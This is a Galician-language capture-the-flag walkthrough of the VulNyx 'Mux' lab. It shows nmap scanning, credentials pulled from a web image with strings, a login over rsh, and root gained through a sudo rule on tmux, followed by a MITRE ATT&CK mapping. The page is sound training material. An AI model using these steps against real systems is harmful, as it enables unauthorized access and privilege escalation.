Ir ao contido

Mux

Máquina virtual Mux

Fig. VulNyx Mux
Fig. Card VulNyx Mux

A máquina Mux é moi interesante porque...

  • Servizos r* (rsh, rlogin, rexec) - servizos legacy
  • Esteganografía: credenciais ocultas en imaxe mediante strings
  • Acceso por rsh en lugar de SSH
  • Escalada mediante tmux con sudo

Diagrama de ataque

Fig. Diagrama de ataque

Fase 1 — Recopilación

sudo arp-scan --interface=eth1 192.168.56.0/24
ping -c2 IP_VulNyx_Mux -R # TTL ≃ 64 ⇒ GNU/Linux, TTL ≃ 128 ⇒ Microsoft Windows
sudo nmap -sS -Pn -T4 -p- -vvv --min-rate 5000 IP_VulNyx_Mux # 80,512,513,514
whatweb IP_VulNyx_Mux
curl -I IP_VulNyx_Mux

Fase 2 — Análise

# Portos 512, 513, 514 → rexec, rlogin, rsh (Remote Shell services)
# Porto 80 → HTTP

# Análise da web
firefox http://IP_VulNyx_Mux &

# Descarga de imaxe da web
wget http://IP_VulNyx_Mux/imaxe.jpg

# Análise de esteganografía na imaxe
strings imaxe.jpg
# Credenciais atopadas: lisa:[contrasinal]

Fase 3 — Explotación

# Acceso mediante rsh con credenciais atopadas
rsh lisa@IP_VulNyx_Mux
# ⇒ Conseguimos shell de usuario lisa (flag user.txt)

Fase 4 — Post‑explotación

# Enumeración de permisos sudo
sudo -l
# User lisa may run the following commands on mux:
#     (root) NOPASSWD: /usr/bin/tmux

# Consulta en GTFOBins para tmux
# Explotación de tmux con sudo
sudo /usr/bin/tmux
# ⇒ Conseguimos shell de root dentro de sesión tmux

# Verificación
whoami # root
cd /root
cat root.txt # ⇒ Flag de root conseguida

Correspondencia de fases → MITRE ATT&CK — VulNyx: Mux

Fase Acción / Resumo Vector principal MITRE ATT&CK (IDs) CWE(s) (relevantes)
1. Recopilación Descubrimento de host e servizos expostos Scanning / descubrimento de servizos T1595 — Active Scanning
T1046 — Network Service Discovery
CWE-200 — Information Exposure (reconnaissance)
2. Análise Extracción de credenciais mediante esteganografía Credential Access / steganography T1027.003 — Obfuscated Files or Information: Steganography
T1552.001 — Unsecured Credentials: Credentials In Files
CWE-312 — Cleartext Storage of Sensitive Information; CWE-522 — Insufficiently Protected Credentials
3. Explotación Acceso mediante rsh con credenciais válidas Remote Shell / uso de contas válidas T1021.004 — Remote Services: SSH
T1078 — Valid Accounts
CWE-798 — Use of Hard-coded Credentials (contextual)
4. Post-explotación Enumeración de permisos sudo Discovery local T1069 — Permission Groups Discovery
T1083 — File and Directory Discovery
CWE-200 — Information Exposure
Abuso de tmux con sudo para escalada de privilexios Abuso de mecanismos de elevación T1548.003 — Abuse Elevation Control Mechanism: Sudo and Sudo Caching
T1059.004 — Command and Scripting Interpreter: Unix Shell
CWE-269 — Improper Privilege Management; CWE-284 — Improper Access Control